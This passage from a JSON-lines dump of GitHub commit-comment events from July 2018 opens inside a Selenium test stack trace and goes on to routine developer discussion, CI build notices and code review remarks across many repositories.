org.xwiki.test.ui.PageObjectSuite.initializePersistentTestContext(PageObjectSuite.java:90)\r\n\tat org.xwiki.test.ui.PageObjectSuite.beforeTests(PageObjectSuite.java:60)\r\n\t... 24 more\r\nCaused by: org.openqa.selenium.WebDriverException: arguments[0] is undefined\r\nCommand duration or timeout: 15 milliseconds\r\nBuild info: version: '2.44.0', revision: '76d78cf323ce037c5f92db6c1bba601c2ac43ad8', time: '2014-10-23 13:11:40'\r\nSystem info: host: 'thinkpad', ip: '127.0.1.1', os.name: 'Linux', os.arch: 'amd64', os.version: '4.15.0-24-generic', java.version: '1.8.0_171'\r\nDriver info: org.openqa.selenium.firefox.FirefoxDriver\r\nCapabilities [{applicationCacheEnabled=true, rotatable=false, handlesAlerts=true, databaseEnabled=true, version=35.0, platform=LINUX, nativeEvents=false, acceptSslCerts=true, webStorageEnabled=true, locationContextEnabled=true, browserName=firefox, takesScreenshot=true, javascriptEnabled=true, cssSelectorsEnabled=true}]\r\nSession ID: c9cfce25-d55b-48c2-9eef-a1fafbcc52b7\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance0(Native Method)\r\n\tat sun.reflect.NativeConstructorAccessorImpl.newInstance(NativeConstructorAccessorImpl.java:62)\r\n\tat sun.reflect.DelegatingConstructorAccessorImpl.newInstance(DelegatingConstructorAccessorImpl.java:45)\r\n\tat java.lang.reflect.Constructor.newInstance(Constructor.java:423)\r\n\tat org.openqa.selenium.remote.ErrorHandler.createThrowable(ErrorHandler.java:204)\r\n\tat org.openqa.selenium.remote.ErrorHandler.throwIfResponseFailed(ErrorHandler.java:156)\r\n\tat org.openqa.selenium.remote.RemoteWebDriver.execute(RemoteWebDriver.java:599)\r\n\tat org.openqa.selenium.remote.RemoteWebDriver.executeScript(RemoteWebDriver.java:508)\r\n\tat org.xwiki.test.ui.XWikiWebDriver.executeScript(XWikiWebDriver.java:808)\r\n\tat org.xwiki.test.ui.XWikiWebDriver.findElement(XWikiWebDriver.java:606)\r\n\tat org.xwiki.test.ui.TestUtils.recacheSecretTokenWhenOnRegisterPage(TestUtils.java:1063)\r\n\tat org.xwiki.test.ui.TestUtils.recacheSecretToken(TestUtils.java:1055)\r\n\tat org.xwiki.test.ui.PageObjectSuite.initializePersistentTestContext(PageObjectSuite.java:88)\r\n\t... 25 more\r\nCaused by: org.openqa.selenium.WebDriverException: arguments[0] is undefined\r\nBuild info: version: '2.44.0', revision: '76d78cf323ce037c5f92db6c1bba601c2ac43ad8', time: '2014-10-23 13:11:40'\r\nSystem info: host: 'thinkpad', ip: '127.0.1.1', os.name: 'Linux', os.arch: 'amd64', os.version: '4.15.0-24-generic', java.version: '1.8.0_171'\r\nDriver info: driver.version: unknown\r\n\tat <anonymous class>.anonymous(http://localhost:8080/xwiki/bin/register/xwiki/Register line 68 > Function:1:1)\r\n\tat <anonymous class>.handleEvaluateEvent(http://localhost:8080/xwiki/bin/register/xwiki/Register:68:20)\r\n```\r\n\r\nThe interesting part is:\r\n```\r\n arguments[0] is undefined\r\n```\r\n\r\n"}},"created_at":"2018-07-18T16:07:38Z"}
{"id":"7983978404","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29752410,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T16:07:42Z","updated_at":"2018-07-18T16:07:42Z","author_association":"NONE","body":"before doing a commit you should remove the cache"}},"created_at":"2018-07-18T16:07:42Z"}
{"id":"7983978942","type":"CommitCommentEvent","actor":{"login":"opentable-devops"},"repo":{"name":"opentable/otj-kafka"},"payload":{"comment":{"id":29752413,"position":null,"line":null,"path":null,"commit_id":"63f9c1c2228cfd24220371bf240ad6bb02f36cc0","created_at":"2018-07-18T16:07:48Z","updated_at":"2018-07-18T16:07:48Z","author_association":"NONE","body":"TeamCity Architecture Team :: Java Platform :: otj-kafka :: BuildTest [Build 200](https://teamcity.otenv.com/viewLog.html?buildId=8957214&buildTypeId=ArchitectureTeam_JavaPlatform_OtjKafka_BuildTest) outcome was **SUCCESS**\nSummary: Tests passed: 9 Build time: 00:01:18"}},"created_at":"2018-07-18T16:07:48Z"}
{"id":"7983980114","type":"CommitCommentEvent","actor":{"login":"editfmah"},"repo":{"name":"giantroboticcat/sharkorm"},"payload":{"comment":{"id":29752416,"position":null,"line":null,"path":null,"commit_id":"f35a81c651e0f267bf7b89ed2ff7842d9b8b71c4","created_at":"2018-07-18T16:08:01Z","updated_at":"2018-07-18T16:08:01Z","author_association":"NONE","body":"Hi @cbarranco, would you mind if I pulled this change into the next version?"}},"created_at":"2018-07-18T16:08:01Z"}
{"id":"7983984686","type":"CommitCommentEvent","actor":{"login":"CFTheMaster"},"repo":{"name":"ReKTDevlol/MonmusuBot"},"payload":{"comment":{"id":29752423,"position":null,"line":null,"path":null,"commit_id":"f8368e5ccb13c0fecbab56692e35c4e39cd36a34","created_at":"2018-07-18T16:08:49Z","updated_at":"2018-07-18T16:08:49Z","author_association":"NONE","body":"# `git rm --cached`\r\nmight help with that"}},"created_at":"2018-07-18T16:08:49Z"}
{"id":"7983985959","type":"CommitCommentEvent","actor":{"login":"prati0100"},"repo":{"name":"prati0100/freebsd"},"payload":{"comment":{"id":29752430,"position":457,"line":457,"path":"sys/x86/xen/busdma_xen.c","commit_id":"940253057069fef06bda18f9208a85893ee9e359","created_at":"2018-07-18T16:09:03Z","updated_at":"2018-07-18T16:09:03Z","author_association":"OWNER","body":"Ok so this is a long explanation which starts with [this email](https://lists.freebsd.org/pipermail/freebsd-hackers/2018-June/052934.html) I sent to the freebsd-hackers@ mailing list. Read the entire conversation if you can.\r\n\r\nAs a summary of what I wrote there, the segs array would get over-written when another load on the same tag is called. The concern I raised there was that this is a bug. Hans Petter Selasky told me that this is expected behavior and that it is the client's responsibility to serialize the loads.\r\n\r\nSo if a load is deferred, after the shortage is over, busdma_bounce fills up the segs array again before calling the client's callback. The scope of the segs array is limited to the callback. After that, it can be over-written. That is the reason tag_create requires lockfunc. This lockfunc is called to acquire the lock provided by the client driver to ensure serial access so that no load is called while another load is in its callback.\r\n\r\nBut we will not be calling load again when the wait for grant refs is over. That load has already finished. So the refs array won't be filled again. Simply doing temp_segs = segs means we save an address to busdma_bounce's tag->segments array ([busdma_bounce.c:76](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L76), [busdma_bounce.c:914](https://github.com/freebsd/freebsd/blob/master/sys/x86/x86/busdma_bounce.c#L914) for reference) which will be over-written as soon as another load is called. And another map _can_ be loaded while this map waits for the grant refs.\r\n\r\nSo, we need to save a copy of the segs array which we can use to grant foreign access, and send back to the client.\r\n\r\nAnother thing I'd mention, there is a check if temp_segs is NULL:\r\n\r\n```C\r\nif (xenmap->temp_segs == NULL) {\r\n\txenmap->temp_segs = malloc(xenmap->nrefs*sizeof(bus_dma_segment_t),\r\n\t\t\tM_BUSDMA_XEN, M_NOWAIT);\r\n\tif (xenmap->temp_segs == NULL) {\r\n\t\tfree(xenmap->refs, M_BUSDMA_XEN);\r\n...\r\n```\r\n\r\nThe inner if is pretty self-explanatory. The outer if is there because this part of code can be called from two locations:\r\n`xen_dmamap_callback()`, and `xen_bus_dmamap_load_phys/buffer/ma()`.\r\n\r\n`xen_dmamap_callback()` already copies the segs array into temp_segs and then calls `xen_load_helper()`, so we don't have to perform a copy in that case. It already exists. And no, I don't think we should call `_bus_dmamap_complete()` to get the segs array when we are coming from `xen_dmamap_callback()` because that has already been called (by subr_bus_dma.c) and its probably not a good idea to call it again. It wouldn't be a problem in the current implementation of busdma_bounce, but we should not assume things the interface does not explicitly specify.\r\n\r\nYou understand now?"}},"created_at":"2018-07-18T16:09:03Z"}
{"id":"7983986757","type":"CommitCommentEvent","actor":{"login":"techthreads"},"repo":{"name":"ThreadsStyling/tslint"},"payload":{"comment":{"id":29752432,"position":null,"line":null,"path":null,"commit_id":"e7b5a0cfc011519261ae8bb51059e4a0f47d504c","created_at":"2018-07-18T16:09:11Z","updated_at":"2018-07-18T16:09:11Z","author_association":"NONE","body":"Build version: __`3.3.0-master.17`__ :crossed_fingers: [`master`](https://github.com/ThreadsStyling/tslint/tree/master) on [*CircleCI*](https://circleci.com/gh/ThreadsStyling/tslint/17) :tada:"}},"created_at":"2018-07-18T16:09:11Z"}
{"id":"7983991597","type":"CommitCommentEvent","actor":{"login":"Jaaron0606"},"repo":{"name":"magoun/racquetball-flex-league-app"},"payload":{"comment":{"id":29752444,"position":null,"line":null,"path":null,"commit_id":"22c94e53df3832b4ea35b709c62ff6b452241748","created_at":"2018-07-18T16:10:03Z","updated_at":"2018-07-18T16:10:03Z","author_association":"COLLABORATOR","body":"updating the fork"}},"created_at":"2018-07-18T16:10:03Z"}
{"id":"7983992012","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29752446,"position":67,"line":606,"path":"xwiki-platform-core/xwiki-platform-test/xwiki-platform-test-ui/src/main/java/org/xwiki/test/ui/XWikiWebDriver.java","commit_id":"4212e52f380b4d9d1ecf8c30eced5a5ab52210ea","created_at":"2018-07-18T16:10:08Z","updated_at":"2018-07-18T16:10:08Z","author_association":"MEMBER","body":"This prevents me to execute functional tests on my machine :disappointed: "}},"created_at":"2018-07-18T16:10:08Z"}
{"id":"7983992112","type":"CommitCommentEvent","actor":{"login":"giantroboticcat"},"repo":{"name":"giantroboticcat/sharkorm"},"payload":{"comment":{"id":29752447,"position":null,"line":null,"path":null,"commit_id":"f35a81c651e0f267bf7b89ed2ff7842d9b8b71c4","created_at":"2018-07-18T16:10:09Z","updated_at":"2018-07-18T16:10:09Z","author_association":"OWNER","body":"Hi, I'm the author of the commit. Feel free to pull it in. It's a trivial fix."}},"created_at":"2018-07-18T16:10:09Z"}
{"id":"7983998474","type":"CommitCommentEvent","actor":{"login":"ndreys"},"repo":{"name":"ndreys/python-evdev"},"payload":{"comment":{"id":29752479,"position":null,"line":null,"path":null,"commit_id":"6ca47f29f1c9dc7295864efd1939e040af9dcac0","created_at":"2018-07-18T16:11:17Z","updated_at":"2018-07-18T16:11:17Z","author_association":"OWNER","body":"@gvalkov, definitely! I was going to finish last commit that adds some usage examples and send a pull request your way, but haven't had the chance yet. I think I'll be able to get it ready by the end of the week and I'll ping you as soon as that happens."}},"created_at":"2018-07-18T16:11:17Z"}
{"id":"7983999211","type":"CommitCommentEvent","actor":{"login":"Kyushik"},"repo":{"name":"MLJejuCamp2017/DRL_based_SelfDrivingCarControl"},"payload":{"comment":{"id":29752484,"position":null,"line":null,"path":null,"commit_id":"c81b831bf59675a0607a62d032f76bec8c3648f6","created_at":"2018-07-18T16:11:25Z","updated_at":"2018-07-18T16:11:25Z","author_association":"COLLABORATOR","body":"Oh. Yes, the graph in my slide was average reward for many steps. Thesedays, I get average score for 50 episodes, you can check it in the tensorboard, if you are using my codes. "}},"created_at":"2018-07-18T16:11:25Z"}
{"id":"7984002158","type":"CommitCommentEvent","actor":{"login":"p51i"},"repo":{"name":"UI-Research/next50"},"payload":{"comment":{"id":29752496,"position":null,"line":null,"path":null,"commit_id":"f0f5e917b7db28829a8d930138b30545312fbe3d","created_at":"2018-07-18T16:11:56Z","updated_at":"2018-07-18T16:11:56Z","author_association":"CONTRIBUTOR","body":"Created multidev environment [next50#ci-88](https://dashboard.pantheon.io/sites/8e7c33cd-c6bd-4dcf-a71d-f1ade4f2e791#ci-88).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-88-next50.pantheonsite.io/)"}},"created_at":"2018-07-18T16:11:56Z"}
{"id":"7984002201","type":"CommitCommentEvent","actor":{"login":"domgreen"},"repo":{"name":"HuddleEng/octopose"},"payload":{"comment":{"id":29752497,"position":8,"line":38,"path":"octopose/deploy.py","commit_id":"8b4342201408d5f87afe828d955f8fd882908b8b","created_at":"2018-07-18T16:11:57Z","updated_at":"2018-07-18T16:11:57Z","author_association":"COLLABORATOR","body":"Quick query, is `environment` the correct Octopus naming? I no longer have access so wanted to make sure we are matching all naming to what they have in the UI."}},"created_at":"2018-07-18T16:11:57Z"}
{"id":"7984003550","type":"CommitCommentEvent","actor":{"login":"viniciusnavarro"},"repo":{"name":"viniciusnavarro/master-blaster"},"payload":{"comment":{"id":29752503,"position":49,"line":49,"path":"vetores.c","commit_id":"dc7126e91ae573655587ec69f8b843045a796221","created_at":"2018-07-18T16:12:11Z","updated_at":"2018-07-18T16:12:11Z","author_association":"OWNER","body":"interessante\r\n"}},"created_at":"2018-07-18T16:12:11Z"}
{"id":"7984007725","type":"CommitCommentEvent","actor":{"login":"HCMV"},"repo":{"name":"HCMV/udemy-heroes"},"payload":{"comment":{"id":29752518,"position":1,"line":5,"path":"villanos.md","commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-18T16:12:55Z","updated_at":"2018-07-18T16:12:55Z","author_association":"OWNER","body":"## Joker\r\nEste es mi villano favorito"}},"created_at":"2018-07-18T16:12:55Z"}
{"id":"7984014038","type":"CommitCommentEvent","actor":{"login":"k0np4ku"},"repo":{"name":"k0np4ku/Azur-Lane-Scripts-Autopatcher"},"payload":{"comment":{"id":29752529,"position":null,"line":null,"path":null,"commit_id":"3b7090f39684f4e1536b1537a3cc6c837025af3e","created_at":"2018-07-18T16:14:04Z","updated_at":"2018-07-18T16:14:04Z","author_association":"OWNER","body":"Sorry, I didn't even notice that there were people leaving a comment in this commit. Please try the new version, and next time create an issue instead."}},"created_at":"2018-07-18T16:14:04Z"}
{"id":"7984014471","type":"CommitCommentEvent","actor":{"login":"HCMV"},"repo":{"name":"HCMV/udemy-heroes"},"payload":{"comment":{"id":29752530,"position":null,"line":null,"path":null,"commit_id":"c3e22b94904fe150822c6daf381cd53d93c473ac","created_at":"2018-07-18T16:14:09Z","updated_at":"2018-07-18T16:14:09Z","author_association":"OWNER","body":"#Notas\r\nEntiendo porque agregaste a Deadshot, _lo necesitaremos_."}},"created_at":"2018-07-18T16:14:09Z"}
{"id":"7984015842","type":"CommitCommentEvent","actor":{"login":"htdebeer"},"repo":{"name":"desphilboy/SVG-cards"},"payload":{"comment":{"id":29752536,"position":null,"line":null,"path":null,"commit_id":"0e74e8afc24b3c2a55157489ededd7c01400964c","created_at":"2018-07-18T16:14:23Z","updated_at":"2018-07-18T16:14:23Z","author_association":"NONE","body":"@desphilboy \r\nThanks! My username is \"htdebeer\" at npm as well."}},"created_at":"2018-07-18T16:14:23Z"}
{"id":"7984028095","type":"CommitCommentEvent","actor":{"login":"AndrewJanuary"},"repo":{"name":"HuddleEng/octopose"},"payload":{"comment":{"id":29752558,"position":8,"line":38,"path":"octopose/deploy.py","commit_id":"8b4342201408d5f87afe828d955f8fd882908b8b","created_at":"2018-07-18T16:16:34Z","updated_at":"2018-07-18T16:16:34Z","author_association":"CONTRIBUTOR","body":"Seems to be `environment` in our current version (v3.4.1) and in the latest Octopus documentation. https://octopus.com/docs/infrastructure/environments"}},"created_at":"2018-07-18T16:16:34Z"}
{"id":"7984031551","type":"CommitCommentEvent","actor":{"login":"vamsikrishnakonakalla"},"repo":{"name":"ext/git-sed"},"payload":{"comment":{"id":29752564,"position":null,"line":null,"path":null,"commit_id":"8779f87f76bd5e15e82002073c067c1551cdfd4b","created_at":"2018-07-18T16:17:14Z","updated_at":"2018-07-18T16:17:14Z","author_association":"NONE","body":"What are you trying to do?"}},"created_at":"2018-07-18T16:17:14Z"}
{"id":"7984033609","type":"CommitCommentEvent","actor":{"login":"bfuzzy"},"repo":{"name":"bfuzzy/ThreatHunter-Playbook"},"payload":{"comment":{"id":29752575,"position":null,"line":null,"path":null,"commit_id":"4cfecb09f31721d8990e887b8a679def4c944fd7","created_at":"2018-07-18T16:17:38Z","updated_at":"2018-07-18T16:17:38Z","author_association":"OWNER","body":"@inigma117 thanks for this and the work put into it. "}},"created_at":"2018-07-18T16:17:38Z"}
{"id":"7984034120","type":"CommitCommentEvent","actor":{"login":"XUSushi"},"repo":{"name":"XUSushi/Daily-Exercise_Basic-python"},"payload":{"comment":{"id":29752576,"position":null,"line":null,"path":null,"commit_id":"db7f937dc3d1a218425a6b7fb22fa2efa59656d4","created_at":"2018-07-18T16:17:43Z","updated_at":"2018-07-18T16:17:43Z","author_association":"OWNER","body":"Basic Python Exercise Chapter 13\r\n"}},"created_at":"2018-07-18T16:17:43Z"}
{"id":"7984040701","type":"CommitCommentEvent","actor":{"login":"Jameson13B"},"repo":{"name":"Jameson13B/front-end-project-week"},"payload":{"comment":{"id":29752590,"position":null,"line":null,"path":null,"commit_id":"c0affcba7fa2d9612b9230838f8743ad794646ff","created_at":"2018-07-18T16:18:57Z","updated_at":"2018-07-18T16:18:57Z","author_association":"OWNER","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Wire up your static React App to our Notes API.](https://trello.com/c/8ZXeYcd6/9-wire-up-your-static-react-app-to-our-notes-api)"}},"created_at":"2018-07-18T16:18:57Z"}
{"id":"7984040705","type":"CommitCommentEvent","actor":{"login":"austinfonacier"},"repo":{"name":"Spokeo/api_authenticator"},"payload":{"comment":{"id":29752589,"position":null,"line":null,"path":null,"commit_id":"c304ca10d029893af74fb1b97d47b2334edb4f3c","created_at":"2018-07-18T16:18:57Z","updated_at":"2018-07-18T16:18:57Z","author_association":"NONE","body":"Thanks @egliang I went ahead and pushed 0.2.1 on rubygems. "}},"created_at":"2018-07-18T16:18:57Z"}
{"id":"7984042258","type":"CommitCommentEvent","actor":{"login":"mediocretes"},"repo":{"name":"Instrumental/instrumental_agent-node"},"payload":{"comment":{"id":29752593,"position":14,"line":19,"path":"test/intrumental-test.js","commit_id":"d277840524061164610cafc7230e45eb153fd442","created_at":"2018-07-18T16:19:12Z","updated_at":"2018-07-18T16:19:12Z","author_association":"NONE","body":"You're a monster, etc etc :+1:"}},"created_at":"2018-07-18T16:19:12Z"}
{"id":"7984042832","type":"CommitCommentEvent","actor":{"login":"nieah914"},"repo":{"name":"nieah914/java"},"payload":{"comment":{"id":29752597,"position":null,"line":null,"path":null,"commit_id":"85a6029623de9ded91bfd6c6092735ccb32ca807","created_at":"2018-07-18T16:19:19Z","updated_at":"2018-07-18T16:19:19Z","author_association":"OWNER","body":"ㄹ"}},"created_at":"2018-07-18T16:19:19Z"}
{"id":"7984046979","type":"CommitCommentEvent","actor":{"login":"LoupVaillant"},"repo":{"name":"LoupVaillant/Monocypher"},"payload":{"comment":{"id":29752607,"position":4,"line":1275,"path":"src/monocypher.c","commit_id":"95dd2bed67fb566202ffbb79db1b570bd18674b2","created_at":"2018-07-18T16:20:04Z","updated_at":"2018-07-18T16:20:04Z","author_association":"OWNER","body":"My current policy (which might change later if relevant evidence comes up) is to never mark anything inline, not even the serialisation functions (`loadxx_le()` and `storexx_le()` come to mind: I once tried to force inline them with macros, I got *worse* performance). Less noise, more readability.\r\n\r\nSecond, this function is so tiny that I'm pretty sure it will be inlined anyway.\r\n\r\nThird, it hardly matters in this case because it is at worse a few hundred function calls worth of overhead, to be compared to the thousands of field multiplications that happen besides them.\r\n"}},"created_at":"2018-07-18T16:20:04Z"}
{"id":"7984048939","type":"CommitCommentEvent","actor":{"login":"travitch"},"repo":{"name":"GaloisInc/crucible"},"payload":{"comment":{"id":29752609,"position":42,"line":42,"path":"crucible/src/Lang/Crucible/Utils/RegRewrite.hs","commit_id":"7aaaa0482ffb880e36665310dac1d36ac87643d4","created_at":"2018-07-18T16:20:25Z","updated_at":"2018-07-18T16:20:25Z","author_association":"CONTRIBUTOR","body":"Could we avoid some bad states here if we used a phantom type? For example, we could change the type of the second callback to `TermStmt s ret -> Annotator Term ext s ret ()` (the first callback would become `Stmt ext s -> Annotator NonTerm ext s ret ()`.  Then we could make it so that `addStmtAfter` is only callable in the `NonTerm` context (`addStmtBefore` could be totally unconstrained)."}},"created_at":"2018-07-18T16:20:25Z"}
{"id":"7984053832","type":"CommitCommentEvent","actor":{"login":"flovilmart"},"repo":{"name":"hbenl/vscode-jasmine-test-adapter"},"payload":{"comment":{"id":29752623,"position":15,"line":14,"path":"src/worker/loadTests.ts","commit_id":"6296cabbb3a7eedf8a113c90e088dfdfabdcc9fb","created_at":"2018-07-18T16:21:19Z","updated_at":"2018-07-18T16:21:19Z","author_association":"CONTRIBUTOR","body":"Thanks! We can perhaps patch `jasmine.env` so when calling `clearReporters()` it will always add our test reporter (more robust)"}},"created_at":"2018-07-18T16:21:19Z"}
{"id":"7984055298","type":"CommitCommentEvent","actor":{"login":"diemoschwarz"},"repo":{"name":"Ircam-RnD/catart-mubu"},"payload":{"comment":{"id":29752625,"position":null,"line":null,"path":null,"commit_id":"859d049e8f37c88f7972aad41884eb9fdf2721b2","created_at":"2018-07-18T16:21:34Z","updated_at":"2018-07-18T16:21:34Z","author_association":"MEMBER","body":"that's it, gettargetminmax sends target back 0..1, gettarget in descr. (see patch \"simple 6 controllers\")"}},"created_at":"2018-07-18T16:21:34Z"}
{"id":"7984057515","type":"CommitCommentEvent","actor":{"login":"sethm"},"repo":{"name":"sbeitzel/Automata"},"payload":{"comment":{"id":29752627,"position":null,"line":null,"path":null,"commit_id":"db5893e19c2ca0aa5a5773ba9a78988dc7da4bd2","created_at":"2018-07-18T16:21:59Z","updated_at":"2018-07-18T16:21:59Z","author_association":"NONE","body":"Thank you for doing so much work on this little 2003 summer project of mine! It looks like you're making a lot of great commits. When you're ready, please feel free to give me a pull request and I'll pull in all of your changes."}},"created_at":"2018-07-18T16:21:59Z"}
{"id":"7984061094","type":"CommitCommentEvent","actor":{"login":"arichiardi"},"repo":{"name":"clojure-emacs/cider-nrepl"},"payload":{"comment":{"id":29752638,"position":null,"line":null,"path":null,"commit_id":"270400f0d236988093db7d0da396fb6416989402","created_at":"2018-07-18T16:22:39Z","updated_at":"2018-07-18T16:22:39Z","author_association":"CONTRIBUTOR","body":"Nice that you added smoke tests in there, good job!"}},"created_at":"2018-07-18T16:22:39Z"}
{"id":"7984063116","type":"CommitCommentEvent","actor":{"login":"nkhatri15"},"repo":{"name":"nkhatri15/hello-world"},"payload":{"comment":{"id":29752646,"position":null,"line":null,"path":null,"commit_id":"8145db6c91eb6ed6fc63654ae7a39de7ff8e44f0","created_at":"2018-07-18T16:23:01Z","updated_at":"2018-07-18T16:23:01Z","author_association":"OWNER","body":"1 line added "}},"created_at":"2018-07-18T16:23:01Z"}
{"id":"7984068559","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29752657,"position":14,"line":14,"path":"Task1/Logic.Task1.Tests/SorterTests.cs","commit_id":"323ff91425d421ec2b090183417ed595ec235479","created_at":"2018-07-18T16:24:04Z","updated_at":"2018-07-18T16:24:04Z","author_association":"OWNER","body":"добавила тесты: https://github.com/Zhikh/NET.S.2018.Zhikh.09/commit/96912615931adeab1e0e9d9f80fa7a4326b6dd88"}},"created_at":"2018-07-18T16:24:04Z"}
{"id":"7984069602","type":"CommitCommentEvent","actor":{"login":"lucas2213690"},"repo":{"name":"viubis/Eng.-Software"},"payload":{"comment":{"id":29752660,"position":null,"line":null,"path":null,"commit_id":"7dc33f8bd9f3e363ef959b3666ae8d275c3d0a79","created_at":"2018-07-18T16:24:15Z","updated_at":"2018-07-18T16:24:15Z","author_association":"COLLABORATOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Gerar estatísticas na forma de relatório para o ADM](https://trello.com/c/BgeJC9Kj/218-gerar-estat%C3%ADsticas-na-forma-de-relat%C3%B3rio-para-o-adm)"}},"created_at":"2018-07-18T16:24:15Z"}
{"id":"7984069786","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29752661,"position":null,"line":null,"path":null,"commit_id":"b0aec4a3b165fc9008e146250de802494a8ac9ec","created_at":"2018-07-18T16:24:17Z","updated_at":"2018-07-18T16:24:17Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-18T16:24:17Z"}
{"id":"7984096609","type":"CommitCommentEvent","actor":{"login":"sidooh92"},"repo":{"name":"rafinho91/events"},"payload":{"comment":{"id":29752739,"position":54,"line":53,"path":"src/main/java/pl/sda/events/service/EmailService.java","commit_id":"1e355593967605b92a4dd286fc72c369069f9238","created_at":"2018-07-18T16:29:18Z","updated_at":"2018-07-18T16:29:18Z","author_association":"COLLABORATOR","body":"too long method  - max method should have like 20-30lines"}},"created_at":"2018-07-18T16:29:18Z"}
{"id":"7984097351","type":"CommitCommentEvent","actor":{"login":"KellenSunderland"},"repo":{"name":"KellenSunderland/incubator-mxnet"},"payload":{"comment":{"id":29752743,"position":null,"line":null,"path":null,"commit_id":"bdd63481487c4d71e6dfaa5b1030c4773c399840","created_at":"2018-07-18T16:29:26Z","updated_at":"2018-07-18T16:29:26Z","author_association":"OWNER","body":"This caused tons of problems with parallel workers.  Basically did not work at all.  All kinds of race conditions."}},"created_at":"2018-07-18T16:29:26Z"}
{"id":"7984107728","type":"CommitCommentEvent","actor":{"login":"nllong"},"repo":{"name":"NREL/OpenStudio-server"},"payload":{"comment":{"id":29752757,"position":5,"line":41,"path":"server/app/controllers/admin_controller.rb","commit_id":"6c5696b7df8130f4feab2d70c080bc121391e418","created_at":"2018-07-18T16:31:25Z","updated_at":"2018-07-18T16:31:25Z","author_association":"MEMBER","body":"we'll need to update this for windows world :("}},"created_at":"2018-07-18T16:31:25Z"}
{"id":"7984109211","type":"CommitCommentEvent","actor":{"login":"stipsan"},"repo":{"name":"catamphetamine/react-responsive-ui"},"payload":{"comment":{"id":29752761,"position":32,"line":280,"path":"source/Expandable.js","commit_id":"2749fcd6c1637f4093031cc0a6786c39f2ac0142","created_at":"2018-07-18T16:31:43Z","updated_at":"2018-07-18T16:31:43Z","author_association":"NONE","body":"@catamphetamine is this IE11 issue related to `scroll-into-view-if-needed`? v2.x should be able to handle it correctly as long as `document.scrollingElement` is polyfilled and the page is not in quirks mode 🙂 "}},"created_at":"2018-07-18T16:31:43Z"}
{"id":"7984112332","type":"CommitCommentEvent","actor":{"login":"Ngalstyan4"},"repo":{"name":"Ngalstyan4/timescaledb"},"payload":{"comment":{"id":29752767,"position":1,"line":1,"path":"src/ddl_utils.c","commit_id":"13073d210c2bffec9a0bd4722d796a3684816faa","created_at":"2018-07-18T16:32:16Z","updated_at":"2018-07-18T16:32:16Z","author_association":"OWNER","body":"Ok, that works, I will refactor it. I just thought that as we move more of ddl stuff to C, it would be better to put all of it in one file. \r\nI am going to also add an `export_chunks` function so I guess that will go in `chunk.c` as well."}},"created_at":"2018-07-18T16:32:16Z"}
{"id":"7984113001","type":"CommitCommentEvent","actor":{"login":"TonisOrmisson"},"repo":{"name":"2amigos/yii2-usuario"},"payload":{"comment":{"id":29752769,"position":5,"line":103,"path":"src/User/resources/views/settings/account.php","commit_id":"19eb9df623063f9afc3959dfded53c7bf59f1f4d","created_at":"2018-07-18T16:32:23Z","updated_at":"2018-07-18T16:32:23Z","author_association":"CONTRIBUTOR","body":"ok, done: https://github.com/2amigos/yii2-usuario/pull/205\r\n"}},"created_at":"2018-07-18T16:32:23Z"}
{"id":"7984114128","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29752773,"position":null,"line":null,"path":null,"commit_id":"dd2fa071a1ec864c165344021f1b105b89d0e62a","created_at":"2018-07-18T16:32:35Z","updated_at":"2018-07-18T16:32:35Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [rsyncupdat](https://rsyncupdat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [scripts/deploy-live.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-live.sh)\n- [scripts/deploy-multidev.sh](https://github.com/pantheon-systems/documentation/commit/b0aec4a3b165fc9008e146250de802494a8ac9ec/scripts/deploy-multidev.sh)\n"}},"created_at":"2018-07-18T16:32:35Z"}
{"id":"7984122767","type":"CommitCommentEvent","actor":{"login":"Zhikh"},"repo":{"name":"Zhikh/NET.S.2018.Zhikh.09"},"payload":{"comment":{"id":29752785,"position":29,"line":28,"path":"Task1/Logic.Task1/Sorter.cs","commit_id":"6a6cfb575cbd8262bc6a4ad1b393a941d6cbf478","created_at":"2018-07-18T16:34:10Z","updated_at":"2018-07-18T16:34:10Z","author_association":"OWNER","body":"Исправила (также исключила всё, что связано с isAscending): https://github.com/Zhikh/NET.S.2018.Zhikh.09/commit/c97163a71d35406cb53420dff74279ef55cbfc46"}},"created_at":"2018-07-18T16:34:10Z"}
{"id":"7984122879","type":"CommitCommentEvent","actor":{"login":"tpoole"},"repo":{"name":"WeAreROLI/JUCE"},"payload":{"comment":{"id":29752786,"position":13,"line":411,"path":"extras/Projucer/Source/Project/jucer_Project.h","commit_id":"fefbbc89b4c3816c5be1ead4c4e5a7c7a218335b","created_at":"2018-07-18T16:34:12Z","updated_at":"2018-07-18T16:34:12Z","author_association":"COLLABORATOR","body":"Thanks! I'll get that changed."}},"created_at":"2018-07-18T16:34:12Z"}
